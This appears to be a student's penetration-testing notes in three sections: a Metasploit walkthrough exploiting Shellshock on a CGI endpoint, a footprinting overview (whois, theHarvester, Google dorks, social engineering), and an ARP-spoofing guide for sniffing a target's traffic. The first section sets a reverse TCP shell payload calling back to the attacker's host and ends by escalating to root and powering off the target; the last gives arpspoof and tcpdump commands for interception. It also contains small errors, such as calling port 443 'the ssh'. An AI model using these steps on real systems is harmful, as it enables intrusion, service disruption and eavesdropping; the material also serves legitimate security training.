Objective:

Shut down target machine using metasploit

Steps:

1. run msfconsole on kali terminal using

   msfconsole

2. check the vulnerability of the target machine by using auxiliary scanner tool on msfconsole by typing

   use auxiliary/scanner/http/apache_mod_cgi_bash_env

   and type

   show options

   to show the options and see the requirements

3. on the requirements, RHOSTS and TARGETURI needs to be filled, RHOSTS needs to be filled with the target ip address, and TARGETURI needs to be filled with /cgi-bin/status, which the terminal command runs on.type

   set RHOSTS target.ip.address

   to set the RHOSTS, and

   set TARGETURI /cgi-bin/status

   to set the TARGETURI to /cgi-bin/status

4. now run

   id

   and

   run

   to see if the target is vulnerable. If the target is vulnerable, it will return the information of the target.

5. Now that the target is vulnerable, we use the exploit bash on msfconsole by typing

   use exploit/multi/http/apache_mod_cgi_bash_env_exec

   and type

   show options

   to show the options and see the requirements

6. repeat step 3 by fulfilling the RHOSTS and TARGETURI with target ip address and /cgi-bin/status correspondingly.
7. we need to set the payload that will be sent into linux shell reverse tcp, to do so, type

   set payload linux/x86/shell/reverse_tcp

8. when we type

   show options

   it will show the payload options and field needed to be fulfilled. the LHOST and LPORT fields need to be filled with your machine ip, where the packet will be sent from, and the port of your machine, 443, the ssh. To do so, type

   set LHOST your.ip.address

   and

   set LPORT 443

9. to run and send the payload to the target machine, type

   run

   if the connection is successful, it will result in open a session between the your local machine and its port, for example 192.168.15.4:443 and the target machine and its port, for example 192.168.15.6:35754

   we can try to check the connection by typing

   ifconfig

   to check whether the ip matches the one shown by msfconsole

10. to shut down the target machine, type

    sudo -s

    to gain the privilege of the root access

    to shut down the machine, type

    poweroff

    

    

    

    
    

    

    

    

    
    

    

    

    

    
    

    

    
    

What is Foot Printing?

Foot printing is used to gain information about the target system. This is used before launching the attack. To do foot printing, we can use some tools, such as DNS queries, whois, Nmap, etc.

What information can we get from doing this?

By doing foot printing, we can gather information of the target such as:

• Network Information, such as IP address, domains, DNS record
• System Information, such as OS used for the website
• Organizational Information, such as the physical address of the owner

Tools:

What are the tools that can be used to do foot printing?

• Whois
• Sam Spade
• Nmap
• nslookup
• Maltego

as cited from https://hackernoon.com/https-medium-com-aamralkar-footprinting-and-reconnaissance-e14010b22a89, there are a lot of different foot printing method,

1. Footprinting through Social Media, this one is the most easiest to do mostly attacker will create fake account/ids and tries to gather as much as possible information about the target Organization.
2. Footprinting through Search Engines like bing, google and duckduckgo. My favorite is duckduckgo. Attackers also look for cache and archives. Some of the good tools are netcraft, shodan, pipl, Google Earth. in order to perform footpriting.
3. Footprinting through the Job sites. Hackers will come to know what tools and technology organization is working on.
4. Target Monitoring through the Alerts like google alerts, twitter alerts, yahoo alerts.
5. Another good method is via Google Hacking databases and Advance search queries. Query string can be used in search and can be used as keywords. Also Google Advance Search Operators can be utilized. For example “intitle index of” list down all the sites with index open. securityfocus.com, hackersforcharity.org/ghdb are few sites where you can get most of the info.
6. Website footprinting is monitoring the target organization website. Web server details, directory structure, developers email id are some of the common info. Also tools available where we can mirror the whole website. Backdated website information can be extracted from archive.org.
7. Email tracking is used to track the emails. Emails are used to gather information in order to perform the social engineering and many other attacks, Spam.
8. DNS Information attackers can get the hosts in the network. Hackers can get A, CNAME, PTR, MX, NS, HINFO records. There are lot of command line utilities available to get the DNS information. nslookup and dig are the most common among the tools.
9. WHOis attackers perform WHOis to understand whois behind a specific domain? ARIN, AFRINIC, RIPE. APNIC, LATNIC are the RIR’s (Regional Internet Registry). We can get info from WHOis like email, domain owner, address, name servers for the domain, registrar.
10. Network Footprinting
11. Footprinting through Social Engineering. Eavesdropping, Shoulder Surfing, Dumpster Diving.

Techniques & Steps for doing foot printing

1. Ping Sweeps

   You can ping the network to check their ip address, for example, you want to check google’s ip address, do

   ping google.com

2. The Harvester

   The harvester is a tool in Kali linux for gathering information of e-mail and accounts and subdomain names from public places such as google, baidu, bing, etc.

   These are the options in using the harvester:

   • -d: Domain to search or company name
   • -b: data source: baidu, bing, bingapi, dogpile, google, googleCSE, googleplus, google-profiles, linkedin, pgp, twitter, vhost, virustotal, threatcrowd, crtsh, netcraft, yahoo, all
   • -s: start in result number X (default: 0)
   • -v: verify host name via dns resolution and search for virtual hosts
   • -f: save the results into an HTML and XML file (both)
   • -n: perform a DNS reverse query on all ranges discovered
   • -c: perform a DNS brute force for the domain name
   • -t: perform a DNS TLD expansion discovery
   • -e: use this DNS server
   • -p: port scan the detected hosts and check for Takeovers (80,443,22,21,8080)
   • -l: limit the number of results to work with(bing goes from 50 to 50 results, google 100 to 100, and pgp doesn’t use this option)
   • -h: use SHODAN database to query discovered hosts

   example of usage

   theharvester -d binus.ac.id -l 500 -b google

3. Whois

   whois is used for getting the data about the url you’re looking for, such as the registrar, the ip, etc

   usage of whois

   whois google.com

4. Google Dorks

   Google can also be used for gathering sensitive information. Google Dorks are simply ways to query Google against certain information that may be useful for your security investigation.
   Some popular operators used to perform Google Dorking:

   • Filetype: you can use this dork to find any kind of filetypes.
   • Ext: can help you to find files with specific extensions (eg. .txt, .log, etc).
   • Intext: can perform queries helps to search for specific text inside any page.
   • Intitle: it will search for any specific words inside the page title.
   • Inurl: will look out for mentioned words inside the URL of any website.

   example of google dorks

   filetype:pdf site:"*.com"

Objective:

To see transferred packets throughout the network

Step:

1. open command line and type

   echo 1 > /proc/sys/net/ipv4/ip_forward

   next find out your ip using

   ifconfig

   after you found your ip, find targeted ip and run

   arpspoof -t your.ip.address target.ip.address

   in this case, my ip is 172.20.10.1 and the target ip is 172.20.10.12

2. run first step in new tab and switch your ip and target ip such as

   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -t target.ip.address your.ip.address
   

3. run in new tab command to eavesdrop packet sent to target

   tcpdump -vv src 172.20.10.12 -w foldername/fileoutputname.pcap

   it will keep listening to the network for a while, to exit press ctrl+c on your keyboard

4. the output of this will be put on your specified foldername/fileoutputname.pcap, you can open the file using Wireshark to see what happened when you listened to the network